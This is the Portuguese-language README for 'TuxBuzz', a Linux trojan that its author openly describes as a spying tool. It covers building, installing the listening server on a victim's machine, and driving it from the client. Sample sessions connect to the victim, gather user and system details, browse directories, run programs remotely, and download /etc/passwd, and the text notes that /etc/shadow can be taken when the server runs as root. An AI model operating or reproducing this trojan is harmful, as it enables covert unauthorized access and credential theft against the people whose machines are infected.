










            TuxBuZZ  bY DoC#include

            v0.0.2b


            darthfeio@lycos.com - UIN: 52461929


                O que e TuxBuzz ? TuxBuzz e um embrio do que nos
            costumamos chamar de "cavalo de troia". E composto de dois
            programas: um programa cliente (tclient) e um programa
            servidor (tserver). O programa servidor e aquele que e
            instalado na mquina "da vitima", o cliente e o que deve
            ser insta lado na mquina de quem vai "bisbilhotar" a
            maquina da vtima. O cli ente e o servidor se comunicam
            por meio de uma conexao TCP/IP. Depois que o servidor e
            instaldo na mquina, ele abrira uma porta (a padrao e

            8081) e ficara em escuta a espera de uma requisio do
            cliente. O servidor ira assumir a identidade de quem
            iniciou o processo, de forma que os privilgios de acesso
            ao sistema de arquivos da mquina "infec tada" sero os
            mesmos de quem iniciou o programa servidor.


            Compilao e instalao:

            nenhuma novidade:


            tar -xzvf tuxbuzz-x.x.x.tar.gz
            cd tuxbuzz-x.x.x
            make
            make install : )


            testando:
            execute o servidor em um terminal:


            ./tserver
            TuXBuZZ Server 0.0.1b bY DoC#include listening on port
            8081 (this version was compiled for debuging)


            em outro terminal, execute o cliente:


            ./tclient
            ********************************************************
            TuXBuZZ Client v0.0.1b bY DoC#include
            CopyRight 2001 All Rights Reserved
            This Software is Registered under the GNU Public License
            ********************************************************
            tuxbuzz>


            por enquanto, os comandos sao bem simples. E possivel
            extrair informa es da maquina (S.O, processador, etc),
            do usuario que iniciou o pro cesso,baixar arquivos para a
            maquina do cliente, listar os arquivos do servidor e andar
            pela rvore de diretrios. Tambm  possvel executar
            programas no servidor.


            conectando:
            tuxbuzz> connect <endereco_ip> [porta]
            exemplo:
            tuxbuzz> connect 127.0.0.1 8081 <ENTER>
            connected to 127.0.0.1 on port 8081
            Wellcome to TuXBuZZ server v0.0.1b (not running as root)

            tuxbuzz>

            A mensagen de boas vindas dependera de se o servidor
            estiver rodando como usuario ou como root. Se estiver
            rodando como root, voc ver uma mensagen diferente:

            tuxbuzz> connect 127.0.0.1 8081 <ENTER>
            connected to 127.0.0.1 on port 8081
            OWWWWWWWW SHIIIIIIIIT !!!!!!!!! NoT OnLY WinDoZe can bE
            HacKed.
            Wellcome to TuXBuZZ server v0.0.1b running as ROOT !!!
            Good Luck !
            tuxbuzz>


            para pegar um arquivo:
            tuxbuzz> get <arquivo_remoto> <arquivo_local>
            (como se fosse um ftp) exemplo:
            tuxbuzz> get /etc/passwd    /home/xyz/passwd <ENTER>
            downloaded file /etc/passwd as /home/xyz/passwd (582 bytes
            total)


            faz o download do arquivo /etc/passwd do servidor para a
            sua maquina nomeando-o como /home/xyz/passwd
            obs1: cuidado ! voce nao podera fazer um "get /etc/shadow"
            a nao ser que o servidor esteja rodando como root...mas se
            estiver, vc podera baixar o que bem entender ! Por isso e
            que esse programa, apesar de ainda ser um embriao, pode

            ser realmente perigoso : (.
            obs2: se voc nao fornecer o nome do arquivo local, o
            conteudo do arquivo remoto sera jogado diretamente para a
            saida padrao (a tela) como se fosse um "cat" remoto. Isso
            e bom se voce quiser apenas visualizar o conteudo de um
            arquivo texto (mas tome cuidado para nao fazer isso com
            arquivos binarios : )).


            pegando informacoes bsicas:
            tuxbuzz> rinfo <remote> ou
            tuxbuzz> rinfo <user>
            tuxbuzz> rinfo remote <ENTER>
            OS: Linux
            Machine Name: comasseto
            Release: 2.0.2
            Version: #1 Sat Aug 18 14:24:50 BRT 2001

            Machine: i586
            tuxbuzz>

            tuxbuzz> rinfo user <ENTER>
            Username: root #oooopppsss !!!!!

            User Password: x #nao tao rapido, tio !!!
            User ID: 0
            Group ID: 0
            Comment:
            Home Directory: /root
            Shell: /bin/bash
            tuxbuzz>


            fechando a conexao:


            tuxbuzz> close <ENTER>
            connection closed. 28 bytes sended, 1998 bytes received.
            tuxbuzz>

            obtendo ajuda dos comandos:


            tuxbuzz> help <ENTER>


            listando diretrios do servidor (igual a um FTP):
            tuxbuzz> ls <ENTER>
            total 16
            drwxr-xr-x    2 docinclude    users    4096 Nov 1 20:41 ./

            drwxr-xr-x    4 docinclude    users    4096 Nov 1 20:18
            ../

            drwxr-xr-x    2 docinclude    users    8394 Nov 1 20:41
            index.html
            drwxr-xr-x    2 docinclude    users    6096 Nov 1 20:41
            tclient
            tuxbuzz>


            caminhando entre diretrios:
            tuxbuzz> cd /etc <ENTER>
            Current working directory now: /etc (14)
            tuxbuzz>


            mostrando o diretrio em que est no servidor:
            tuxbuzz> pwd <ENTER>
            /etc/rc.d
            tuxbuzz>


            executando comandos do shell no cliente sem ter que sair
            do programa:
            basta iniciar o comando com um "!" (exclamao). O
            programa ir enviar o comando para o shell e voc poder
            ver
            a sada normalmente:
            exemplo:
            tuxbuzz> ! ls -laF <ENTER>
            total 20
            drwxr-xr-x    2 docinclude    users    4096 Nov 1 20:41 ./


            drwxr-xr-x    4 docinclude    users    4096 Nov 1 20:18
            ../
            drwxr-xr-x    2 docinclude    users    8394 Nov 1 20:41
            README
            tuxbuzz>


            executando programas no servidor (ainda no est
            completamente funcional)
            tuxbuzz> exec gimp <ENTER>


            saindo do programa:

            tuxbuzz> quit <ENTER>
            xyz@blablabla:~/tuzbuzz-0.0.1b$

             
             
             

            E por enquanto e isso ai... enjoy !


            bY DoC#include
